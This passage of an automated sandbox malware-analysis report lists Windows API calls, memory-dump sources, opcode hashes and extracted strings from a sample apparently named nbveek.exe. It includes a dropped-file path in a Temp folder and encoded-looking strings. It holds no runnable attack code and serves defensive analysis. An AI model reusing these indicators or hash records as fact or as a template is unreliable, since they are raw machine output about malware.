                                                                                                                                                                                      • GetLastError.KERNEL32(?,011933BC,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0118E693,00000000,00000104,?), ref: 0118E54E
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0118E555
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2398240785-0
                                                                                                                                                                                      • Opcode ID: 2a32611e70742aa609e3f0ec21ad0cf03b4458a218d9bd157822c43b0b40e4bc
                                                                                                                                                                                      • Instruction ID: 36355b8b4ea873e94ef03a722c6659142d65faf85b701d9c11d4cdc4a7b5b27a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a32611e70742aa609e3f0ec21ad0cf03b4458a218d9bd157822c43b0b40e4bc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 21F08176701116BBCB287BA6DC0889AFFA9FF452A0305C120F529C6120EB31E860CFE1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0118E693,00000000,?,01193347,00000000,00000000,0118E693,?,?,00000000,00000000,00000001), ref: 0118E5AD
                                                                                                                                                                                      • GetLastError.KERNEL32(?,01193347,00000000,00000000,0118E693,?,?,00000000,00000000,00000001,00000000,00000000,?,0118E693,00000000,00000104), ref: 0118E5B7
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0118E5BE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2398240785-0
                                                                                                                                                                                      • Opcode ID: 0798c4081e1a92634bbb216574f1474fea5888778d58307f8f5b0491c085c2e7
                                                                                                                                                                                      • Instruction ID: 5c0db89c4b12e04b81766a323b91877296cbf3312e57a0a2e51757db0dbfe044
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0798c4081e1a92634bbb216574f1474fea5888778d58307f8f5b0491c085c2e7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 44F08136702116BBCB287FA6C808C5ABFA9FF546A0304C120F52AC6510E731E860CFE1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(01175020,00000000,011A68E8,00000000,01175020,?,01195757,01175020,00000001,01175020,01175020,?,01192B7F,00000000,?,01175020), ref: 01196057
                                                                                                                                                                                      • GetLastError.KERNEL32(?,01195757,01175020,00000001,01175020,01175020,?,01192B7F,00000000,?,01175020,00000000,01175020,?,011930D3,01175020), ref: 01196063
                                                                                                                                                                                        • Part of subcall function 01196029: CloseHandle.KERNEL32(FFFFFFFE,01196073,?,01195757,01175020,00000001,01175020,01175020,?,01192B7F,00000000,?,01175020,00000000,01175020), ref: 01196039
                                                                                                                                                                                      • ___initconout.LIBCMT ref: 01196073
                                                                                                                                                                                        • Part of subcall function 01195FEB: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0119601A,01195744,01175020,?,01192B7F,00000000,?,01175020,00000000), ref: 01195FFE
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(01175020,00000000,011A68E8,00000000,?,01195757,01175020,00000001,01175020,01175020,?,01192B7F,00000000,?,01175020,00000000), ref: 01196088
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                                      • Opcode ID: 8be00f9ab19d7c7864b3f8d62754779c4256bc770789d6cce139ba1392a2ed2c
                                                                                                                                                                                      • Instruction ID: dc59d398bba8db2b49674eea3c779c3a2d58406b0469b77b7c284fc292bd607f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8be00f9ab19d7c7864b3f8d62754779c4256bc770789d6cce139ba1392a2ed2c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BF0A036501214BBCF7A1F95DC04A8E3F32FF086B1B080424FA3881120C73298A0DBA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SleepConditionVariableCS.KERNELBASE(?,01186E07,00000064), ref: 01186E8D
                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(011A9708,000000FF,?,01186E07,00000064,?,?,?,01173CC0,011AC468,A875633B,?,00000000,011984B8,000000FF), ref: 01186E97
                                                                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,01186E07,00000064,?,?,?,01173CC0,011AC468,A875633B,?,00000000,011984B8,000000FF), ref: 01186EA8
                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(011A9708,?,01186E07,00000064,?,?,?,01173CC0,011AC468,A875633B,?,00000000,011984B8,000000FF), ref: 01186EAF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3269011525-0
                                                                                                                                                                                      • Opcode ID: def061a7e6d9162f1ab9907f88697f990b59d0fe0181a70c0b53d02dab1ceff2
                                                                                                                                                                                      • Instruction ID: 0e7cad128fbf083bd4396259a8dfc0868ea19311983f6ebe19c381a9a6e1f5d7
                                                                                                                                                                                      • Opcode Fuzzy Hash: def061a7e6d9162f1ab9907f88697f990b59d0fe0181a70c0b53d02dab1ceff2
                                                                                                                                                                                      • Instruction Fuzzy Hash: E2E09239542538BBCA2D6F80EC09ADD3E14FB08A76B404030F52566254CB6168C0CFF1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 0118C574
                                                                                                                                                                                        • Part of subcall function 0118D301: HeapFree.KERNEL32(00000000,00000000,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?), ref: 0118D317
                                                                                                                                                                                        • Part of subcall function 0118D301: GetLastError.KERNEL32(?,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?,?), ref: 0118D329
                                                                                                                                                                                      • _free.LIBCMT ref: 0118C587
                                                                                                                                                                                      • _free.LIBCMT ref: 0118C598
                                                                                                                                                                                      • _free.LIBCMT ref: 0118C5A9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: ce2a57311f3338ccee878c681a732bf3016855de88b8bfcb41124935688bd2dd
                                                                                                                                                                                      • Instruction ID: df48f2d01543c33ab1c3f248fac2f69671e500f252bab3b36c1efb7e8aec955d
                                                                                                                                                                                      • Opcode Fuzzy Hash: ce2a57311f3338ccee878c681a732bf3016855de88b8bfcb41124935688bd2dd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AE0BFB1454A26DA8F2F7F55BA4088D3E66AB94628381C026E8346B25CEB3709D5DF81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,A875633B,?,00000000), ref: 0117639F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                                                      • String ID: LSPzeTFmPvUv$Xv==
                                                                                                                                                                                      • API String ID: 514040917-2354779737
                                                                                                                                                                                      • Opcode ID: 54bd200d59353a2fe7ca262fee95179bbf934705154252bc11f199dc88a52fd0
                                                                                                                                                                                      • Instruction ID: f87836e654ccbd27f774cdd9eab8eca8b484b8176d9ce0ff400343ddebd46ab4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 54bd200d59353a2fe7ca262fee95179bbf934705154252bc11f199dc88a52fd0
                                                                                                                                                                                      • Instruction Fuzzy Hash: E491A271A001188BEB2CDB28CD957DDBBB6EB86304F5481E8D509A7395DB319EC4CF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,A875633B,00000000), ref: 0117917C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                                                      • String ID: IduAVd==$UVHNZBxKIQM=
                                                                                                                                                                                      • API String ID: 514040917-3300743538
                                                                                                                                                                                      • Opcode ID: 53bad1d773ce7a52b90ebe15d34987f6ec46cdf9a5fb6503bff53cce2a71ff0a
                                                                                                                                                                                      • Instruction ID: 28ebe0d50b58e809d107fd82ac504e1ee557bf92959c7d9c7fa2b8411bf869f8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 53bad1d773ce7a52b90ebe15d34987f6ec46cdf9a5fb6503bff53cce2a71ff0a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E51C170904259DBDB29EB28CD597DDBBB1AB12308F9481D8D4086B381DB750F888FE2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                      • API String ID: 0-3515184742
                                                                                                                                                                                      • Opcode ID: fe02dc1826e54573671bbe1081b4d2a5dd55992c7065548c303fe298686a002c
                                                                                                                                                                                      • Instruction ID: e0665ed956b921d4f31e4598143e05df7cf70bd72c3be0661e4cffc59155747b
                                                                                                                                                                                      • Opcode Fuzzy Hash: fe02dc1826e54573671bbe1081b4d2a5dd55992c7065548c303fe298686a002c
                                                                                                                                                                                      • Instruction Fuzzy Hash: D941B570A08619AFDB2EFF9DD880D9EBBF8EB84314F108066E510DB240DB709A81DF55
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 01188C52
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EncodePointer
                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                                                                      • Opcode ID: 80cf3ef48514b06b6604a1ae5a0cb0491981feda23089e4186589bfe6fc4ace0
                                                                                                                                                                                      • Instruction ID: abe133904ff51333519f9613234ce7f8761dafee8dde628bee2d91881efab54e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 80cf3ef48514b06b6604a1ae5a0cb0491981feda23089e4186589bfe6fc4ace0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C418A72900209AFDF1AEF98CD80AEEBBB5FF58304F588199FA1467221D3359951CF60
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01181DB0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                                                      • String ID: 5120$H
                                                                                                                                                                                      • API String ID: 514040917-2391956277
                                                                                                                                                                                      • Opcode ID: 5de7f98a39cd74555519c8d175eeb6a83502870f203967f135d66f414c2fd321
                                                                                                                                                                                      • Instruction ID: c7ae85941a77fc4d66d432f0dc0e6f061a3b9108f112662e9cc7a5e4ce300ae2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5de7f98a39cd74555519c8d175eeb6a83502870f203967f135d66f414c2fd321
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2521ACB0900348ABDB18FF28CA467DD7FB9AB06708F9441CCD54827281D7758A488FA3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%